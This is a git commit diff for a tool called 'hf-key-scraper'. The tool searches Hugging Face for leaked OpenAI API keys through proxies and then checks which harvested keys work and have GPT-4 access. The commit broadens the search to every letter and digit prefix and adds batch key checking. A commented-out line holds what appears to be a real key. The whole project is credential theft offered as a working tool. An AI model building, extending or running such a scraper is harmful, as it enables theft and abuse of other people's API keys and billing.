final commit

2023-10-20 18:54:11 -06:00 · 2023-10-20 18:54:11 -06:00 · c13c224b36
parent 15759586e4
commit c13c224b36
6 changed files with 27 additions and 20 deletions
--- a/.gitignore
+++ b/.gitignore
@ -1,4 +1,6 @@
 .idea
+found-keys*.txt
+

 # ---> Python
 # Byte-compiled / optimized / DLL files
--- a/README.md
+++ b/README.md
@ -1,3 +1,5 @@
 # hf-key-scraper

-Scrape for OpenAI keys on Hugging Face
+Scrape for OpenAI keys on Hugging Face.
+
+This requires at least one Squid proxy to function. Define your proxies in `settings.py` -> `PROXIES`.
--- a/huggingface/check-keys.py
+++ b/huggingface/check-keys.py
@ -1,8 +1,9 @@
 import argparse
-import concurrent
 from concurrent.futures import ThreadPoolExecutor
 from pathlib import Path

+from tqdm import tqdm
+
 from keychecker.check import check_key


@ -17,26 +18,29 @@ def process_key(key):

 def main():
    parser = argparse.ArgumentParser(description='Scrape data from chub.ai.')
-    parser.add_argument('input_file', help='Path to the file containing the keys.')
+    parser.add_argument('input_file', nargs='*', help='Path to the file containing the keys.')
    args = parser.parse_args()

-    input_file = Path(args.input_file).resolve().absolute()
-
+    keys = set()
+    for file in args.input_file:
+        input_file = Path(file).resolve().expanduser().absolute()
        if not input_file.exists():
            print('Input file does not exist:', input_file)
            quit(1)
-
-    with open(input_file) as f:
-        content = set(f.read().splitlines())
+        data = set(input_file.read_text().splitlines())
+        keys = keys | data

    # content = ['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']

+    print('Checking', len(keys), 'keys...')
+
    gpt_4 = set()
    gpt_4_32k = set()
    gpt_3 = set()
+    pbar = tqdm(total=len(keys))

    with ThreadPoolExecutor(max_workers=50) as executor:
-        results = executor.map(process_key, content)
+        results = executor.map(process_key, keys)
        for result in results:
            if result is not None:
                if result['has_gpt_4']:
@ -45,6 +49,8 @@ def main():
                    gpt_4_32k.add(result['api_key'])
                if result['has_only_turbo']:
                    gpt_3.add(result['api_key'])
+            pbar.update(1)
+    pbar.close()
    print('')

    print('GPT4 KEYS:')
--- a/huggingface/huggingface/settings.py
+++ b/huggingface/huggingface/settings.py
@ -92,10 +92,7 @@ TWISTED_REACTOR = "twisted.internet.asyncioreactor.AsyncioSelectorReactor"
 FEED_EXPORT_ENCODING = "utf-8"

 PROXIES = [
-    "http://172.0.4.7:3128",
-    "http://172.0.4.8:3128",
-    "http://172.0.4.10:3128",
-    "http://172.0.4.12:3128",
+    "http://127.0.0.1:3128"
 ]

 LOG_LEVEL = 'CRITICAL'
--- a/huggingface/huggingface/spiders/huggingface.py
+++ b/huggingface/huggingface/spiders/huggingface.py
@ -31,5 +31,5 @@ class HuggingfaceSpider(CrawlSpider):
        text = response.text
        matches = self.regex.findall(text)
        if matches:
-            self.logger.error(f"{matches}")
+            self.logger.debug(f"{matches}")
            return FoundItem(url=response.url, matches=matches)
--- a/huggingface/huggingface/spiders/search.py
+++ b/huggingface/huggingface/spiders/search.py
@ -4,14 +4,14 @@ import time

 import coloredlogs
 import scrapy
-
+from string import ascii_lowercase, ascii_uppercase
 from ..pipelines import FoundItem


 class HFSearchSpider(scrapy.Spider):
    name = "huggingface_search"
    allowed_domains = ["huggingface.co"]
-    start_urls = ['https://huggingface.co/search/full-text?q=sk-{}&limit=100&skip={}'.format(i, j * 100) for i in ['a', 'h', 'm', 'q'] for j in range(10)]
+    start_urls = ['https://huggingface.co/search/full-text?q=sk-{}&limit=100&skip={}'.format(i, j * 100) for i in [*ascii_lowercase, *ascii_uppercase, *range(10), 'etk', 'ant'] for j in range(10)]
    logger = logging.getLogger('HFSearchSpider')
    logger.setLevel(logging.DEBUG)
    coloredlogs.install(logger=logger, level=logging.DEBUG)
@ -27,5 +27,5 @@ class HFSearchSpider(scrapy.Spider):
        for key in keys:
            found_keys.add(''.join(key))
        if len(found_keys):
-            self.logger.error(f"{found_keys}")
+            self.logger.debug(f"{found_keys}")
            yield FoundItem(url=response.url, matches=found_keys)